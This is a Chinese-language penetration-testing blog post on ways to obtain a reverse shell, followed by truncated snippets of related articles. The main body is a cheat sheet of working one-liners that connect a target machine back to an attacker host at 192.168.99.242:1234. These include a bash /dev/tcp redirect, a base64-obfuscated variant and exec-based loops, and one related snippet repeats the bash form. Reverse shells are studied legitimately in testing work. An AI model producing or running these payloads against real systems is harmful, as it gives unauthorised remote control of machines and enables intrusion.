反弹shell的各种姿势
在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。
反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步。所有姿势整理自网络,假设,攻击者主机为:192.168.99.242,本地监听1234端口,如有特殊情况以下会备注说明。
Linux 反弹shell
姿势一:bash反弹
bash -i >& /dev/tcp/192.168.99.242/1234 0>&1 base64版:bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk5LjI0Mi8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}' 在线编码地址:http://www.jackson-t.ca/runtime-exec-payloads.html
其他版本:
exec 5<>/dev/tcp/192.168.99.242/1234;cat <&5 | while read line; do $line 2>&5 >&5;done exec /bin/sh 0</dev/tcp/192.168.99.242/1234 1>&0 2>&0
反弹shell的各种姿势相关推荐
- 带你了解LINUX反弹Shell的各种姿势(超详细)
简介 LInux反弹Shell(Reveser Shell), 也可以称为反向Shell, 由被控制端主动向控制端发送请求建立通讯, 随后将执行命令的结果输出到控制端, 本质上是网络概念的客户端与服务 ...
- 【好文转载】linux反弹shell的各种姿势
本文为转载,原作者与链接如下: 作者:@11阳光 https://www.cnblogs.com/sunny11/p/14290092.html 题记 搞完xss钓鱼一时不知道服务器还能干点什么,然后 ...
- python反弹shell_反弹shell的各种姿势
在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入. 反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步.所有姿势 ...
- 反弹shell的十种姿势
bash版本: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 ,注意这个是由解析shell的bash完成,所以某些情况下不支持 perl版本 ...
- 反弹shell的N种姿势
目录 前言: 一.Bash反弹 1.1 方法一 1.2 方法二 1.3 方法三 二. telnet反弹 2.1 方法一 2.2 方法二 三.nc(netcat)反弹 四.常见的脚本反弹 4.1 pyt ...
- windows 反弹shell_容器内反弹shell的51种姿势
什么是反弹shell? 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端.reverse shell与tel ...
- java Runtime.getRuntime().exec 获取反弹shell
说明 前面写了一篇在Java环境下获取shell的文章.当时使用的语句是: Runtime r = Runtime.getRuntime(); Process p = r.exec(new Strin ...
- linux下几种反弹Shell方法的总结与理解
实验环境 CentOS 6.5:192.168.0.3 kali2.0:192.168.0.4 方法1: 反弹shell命令如下: bash -i >& /dev/tcp/ip/port ...
- cmd管道无法接收特定程序返回值_渗透不会反弹shell?来教你写一个cmd的shell
渗透不会反弹shell?来教你写一个cmd的shell 包含的库: #include #include #include #include #include #pragma comment(lib, ...
- 反弹shell的总结
前言 ctf中经常执行命令没有回显,需要进行反弹shell,而不同的环境反弹shell的姿势也不尽相同,所以就在这里总结一下,自己以后遇到了什么新的姿势都会加进来. 比较常见的姿势 比较常见的基本就是 ...
最新文章
- tf.variable_scope 参数
- 使用libjpeg进行图片压缩(哈夫曼算法,无损压缩)
- TLS回调函数(2)
- C#session共享+redis_Shiro权限管理框架(二):Shiro结合Redis实现分布式环境下的Session共享...
- 因为阿里,他们成了“杭漂”
- 支持html5特性的浏览器,HTML 5浏览器的支持情况
- LeetCode 2105. 给植物浇水 II(双指针)
- Intel Skylake (Client) 架构/微架构/流水线 (2) - 前端
- 【Git】error: RPC
- python零基础学习书-Python零基础到进阶必读的书藉:Python学习手册pdf免费下载
- javascript里new构造函数返回的值
- 《NX-OS与Cisco Nexus交换技术:下一代数据中心架构(第2版)》一2.9 本章小结...
- php中联合运算符,PHP-串联运算符
- CSDN新手机号绑定不成功,提示已存在账号,CSDN换绑手机号的相关问题
- vue项目富文本编辑器输入格式化以计算总字数
- 思科交换机接口配置trunk_cisco二层交换机和三层交换机怎么设置trunk
- oracle的显示和隐式,oracle的显式受权和隐式授权(转)
- 从我开发的深度学习框架看深度学习这几年:TensorFlow, PaddlePaddle(飞桨), 无量...
- 如何在Ubuntu上方便使用OpenAI API key
- Java 超.简易RPG游戏